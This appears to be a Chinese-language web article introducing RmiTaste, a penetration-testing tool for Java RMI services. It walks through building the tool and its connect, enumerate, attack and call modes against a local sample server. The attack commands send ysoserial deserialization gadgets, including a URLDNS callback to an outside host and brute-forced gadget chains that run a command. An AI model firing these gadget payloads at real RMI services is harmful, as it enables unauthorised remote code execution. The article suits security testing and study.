您好,登錄后才能下訂單哦!
小編給大家分享一下RmiTaste是一款什么工具,相信大部分人都還不怎么了解,因此分享這篇文章給大家參考一下,希望大家閱讀完這篇文章后大有收獲,下面讓我們一起去了解一下吧!
RmiTaste可以幫助廣大安全研究專家通過(guò)調(diào)用ysoserial實(shí)用工具所提供的遠(yuǎn)程方法來(lái)檢測(cè)、枚舉、交互和攻擊RMI服務(wù)。除此之外,它還允許我們使用特定的參數(shù)來(lái)調(diào)用遠(yuǎn)程方法。
RmiTaste的主要目的是為了幫助安全專家識(shí)別目標(biāo)系統(tǒng)中不安全的RMI服務(wù),針對(duì)目標(biāo)計(jì)算機(jī)系統(tǒng)未經(jīng)授權(quán)的訪問(wèn)是一種違法行為,RmiTaste的使用必須要在合法場(chǎng)景下進(jìn)行。
注意,本工具的運(yùn)行需要OpenJDK v11.0.3。
首先,我們需要下載ysoserial-master-SNAPSHOT.jar,然后將其存儲(chǔ)在libs_attack目錄中,下載地址如下:
https://github.com/frohoff/ysoserial
第二步,使用maven構(gòu)建項(xiàng)目代碼:
mvn package
接下來(lái),運(yùn)行下列命令:
java -cp ".:libs_attack/*:target/rmitaste-1.0-SNAPSHOT-all.jar" m0.rmitaste.RmiTaste -h __________ ._____________ __ \______ \ _____ |__\__ ___/____ _______/ |_ ____ | _// \| | | | \__ \ / ___/\ __\/ __ \ | | \ Y Y \ | | | / __ \_\___ \ | | \ ___/ |____|_ /__|_| /__| |____| (____ /____ > |__| \___ > \/ \/ \/ \/ \/ @author Marcin Ogorzelski (mzero - @_mzer0) STM Solutions Warning: RmiTaste was written to aid security professionals in identifying the insecure use of RMI services on systems which the user has prior permission to attack. RmiTaste must be used in accordance with all relevant laws. Failure to do so could lead to your prosecution. The developers assume no liability and are not responsible for any misuse or damage caused by this program.
RmiTaste提供了四種運(yùn)行模式,分別為連接、枚舉、攻擊和調(diào)用。每一種模式都提供了單獨(dú)的幫助菜單:
java -cp ".:libs_attack/*:target/rmitaste-1.0-SNAPSHOT-all.jar" m0.rmitaste.RmiTaste -h (...) Usage: <main class> [-h] [COMMAND] -h, --help 顯示這條幫助信息 Commands: conn 檢測(cè)與主機(jī)的連接 enum 枚舉RMI服務(wù) attack 攻擊RMI注冊(cè)方法 call 調(diào)用RMI遠(yuǎn)程對(duì)象的特定方法
conn連接模式允許我們判斷目標(biāo)端口是否為RMI服務(wù)端口:
# Check if 127.0.0.1:1099 is RMI Service java -cp ".:libs_attack/*:target/rmitaste-1.0-SNAPSHOT-all.jar" m0.rmitaste.RmiTaste conn -t 127.0.0.1 -p 1099
enum枚舉模式允許研究人員獲取RMI服務(wù)的相關(guān)信息,比如說(shuō)遠(yuǎn)程對(duì)象名以及遠(yuǎn)程對(duì)象實(shí)現(xiàn)和繼承的類名。如果遠(yuǎn)程對(duì)象所實(shí)現(xiàn)的接口在RmiTaste類路徑中可訪問(wèn),那么RmiTaste將會(huì)打印出所有的遠(yuǎn)程方法,并支持我們直接調(diào)用:
# RMI service enumeration java -cp ".:libs_attack/*:target/rmitaste-1.0-SNAPSHOT-all.jar" m0.rmitaste.RmiTaste enum -t 127.0.0.1 -p 1099
attack攻擊模式允許使用ysoserial特定的實(shí)用工具鏈來(lái)調(diào)用遠(yuǎn)程方法。假設(shè)遠(yuǎn)程對(duì)象擁有下列方法:
acc1 [object] [127.0.1.1:38293] implements java.rmi.Remote [interface] extends java.lang.reflect.Proxy [class] implements m0.rmitaste.example.server.ClientAccount [interface] setPin(java.lang.String param0); [method] Parameters: param0; may be vulnerable to Java Deserialization! [info] getBalance(); [method] deposit(java.lang.Object param0); [method] Parameters: param0; may be vulnerable to Java Deserialization! [info] withdraw(float param0); [method]
# Call all remote methods with URLDNS gadget as parameter java -cp ".:libs_attack/*:target/rmitaste-1.0-SNAPSHOT-all.jar" m0.rmitaste.RmiTaste attack -t 127.0.0.1 -p 1099 -g "URLDNS" -c "http://rce.mzero.pl"
# Call acc1:m0.rmitaste.example.server.ClientAccount:deposit method with URLDNS gadget as parameter java -cp ".:libs_attack/*:target/rmitaste-1.0-SNAPSHOT-all.jar" m0.rmitaste.RmiTaste attack -t 127.0.0.1 -p 1099 -m "acc1:m0.rmitaste.example.server.ClientAccount:deposit" -g "URLDNS" -c "http://rce.mzero.pl"
"-gen bruteforce"選項(xiàng)還允許我們實(shí)現(xiàn)對(duì)遠(yuǎn)程方法的暴力破解:
# Call acc1:m0.rmitaste.example.server.ClientAccount:deposit method with gadgets from ysoserial and command ping 127.0.0.1 java -cp ".:libs_attack/*:target/rmitaste-1.0-SNAPSHOT-all.jar" m0.rmitaste.RmiTaste attack -t 127.0.0.1 -p 1099 -m "acc1:m0.rmitaste.example.server.ClientAccount:deposit" -gen bruteforce -c "ping 127.0.0.1"
call調(diào)用模式允許我們調(diào)用RMI遠(yuǎn)程對(duì)象的特定方法,假設(shè)遠(yuǎn)程對(duì)象擁有下列方法:
acc1 [object] [127.0.1.1:38293] implements java.rmi.Remote [interface] extends java.lang.reflect.Proxy [class] implements m0.rmitaste.example.server.ClientAccount [interface] setPin(java.lang.String param0); [method] Parameters: param0; may be vulnerable to Java Deserialization! [info] getBalance(); [method] deposit(java.lang.Object param0); [method] Parameters: param0; may be vulnerable to Java Deserialization! [info] withdraw(float param0); [method]
# Call m0.rmitaste.example.server.ClientAccount.getBalance method on acc1 remote object java -cp ".:libs_attack/*:target/rmitaste-1.0-SNAPSHOT-all.jar" m0.rmitaste.RmiTaste call -t 127.0.0.1 -p 1099 -m "acc1:m0.rmitaste.example.server.ClientAccount:getBalance"
# Call m0.rmitaste.example.server.ClientAccount.setPin("1234") method on acc1 remote object java -cp ".:libs_attack/*:target/rmitaste-1.0-SNAPSHOT-all.jar" m0.rmitaste.RmiTaste call -t 127.0.0.1 -p 1099 -m "acc1:m0.rmitaste.example.server.ClientAccount:setPin" -mp "string=1234
點(diǎn)擊【這里】獲取樣本服務(wù)器。
首先,運(yùn)行樣本服務(wù)器。
接下來(lái),進(jìn)行對(duì)象枚舉:
root@keyisinyourmind:/media/sf_pentest2/Tools/python/Toolset/Others/RmiTasteTool# java -cp ".:libs_attack/*:target/rmitaste-1.0-SNAPSHOT-all.jar" m0.rmitaste.RmiTaste enum -t 127.0.0.1 -p 1099 acc1 [object] [127.0.1.1:42881] extends java.rmi.server.RemoteObjectInvocationHandler [class] implements java.rmi.Remote [interface] extends java.lang.reflect.Proxy [class] extends java.rmi.server.RemoteObject [class] implements m0.rmitaste.example.server.ClientAccount [interface] No methods found. I don't have remote object interface. Give it to me! acc2 [object] [127.0.1.1:42881] extends java.rmi.server.RemoteObjectInvocationHandler [class] implements java.rmi.Remote [interface] extends java.lang.reflect.Proxy [class] extends java.rmi.server.RemoteObject [class] implements m0.rmitaste.example.server.ClientAccount [interface] No methods found. I don't have remote object interface. Give it to me!
大家可以看到,RmiTaste需要用到遠(yuǎn)程對(duì)象的接口。在滲透測(cè)試過(guò)程中,我們還需要去尋找這些接口。在這個(gè)樣例中,我們只需要將rmitaste.examples-1.0-SNAPSHOT-all.jar拷貝到libs_attack目錄中節(jié)課。枚舉對(duì)象樣例如下:
acc1 [object] [127.0.1.1:42881] extends java.rmi.server.RemoteObjectInvocationHandler [class] implements java.rmi.Remote [interface] extends java.lang.reflect.Proxy [class] extends java.rmi.server.RemoteObject [class] implements m0.rmitaste.example.server.ClientAccount [interface] setPin(java.lang.String param0); [method] Parameters: param0; may be vulnerable to Java Deserialization! [info] getBalance(); [method] deposit(java.lang.Object param0); [method] Parameters: param0; may be vulnerable to Java Deserialization! [info] withdraw(float param0); [method] acc2 [object] [127.0.1.1:42881] extends java.rmi.server.RemoteObjectInvocationHandler [class] implements java.rmi.Remote [interface] extends java.lang.reflect.Proxy [class] extends java.rmi.server.RemoteObject [class] implements m0.rmitaste.example.server.ClientAccount [interface] setPin(java.lang.String param0); [method] Parameters: param0; may be vulnerable to Java Deserialization! [info] getBalance(); [method] deposit(java.lang.Object param0); [method] Parameters: param0; may be vulnerable to Java Deserialization! [info] withdraw(float param0); [method]
以上是“RmiTaste是一款什么工具”這篇文章的所有內(nèi)容,感謝各位的閱讀!相信大家都有了一定的了解,希望分享的內(nèi)容對(duì)大家有所幫助,如果還想學(xué)習(xí)更多知識(shí),歡迎關(guān)注億速云行業(yè)資訊頻道!
免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如果涉及侵權(quán)請(qǐng)聯(lián)系站長(zhǎng)郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。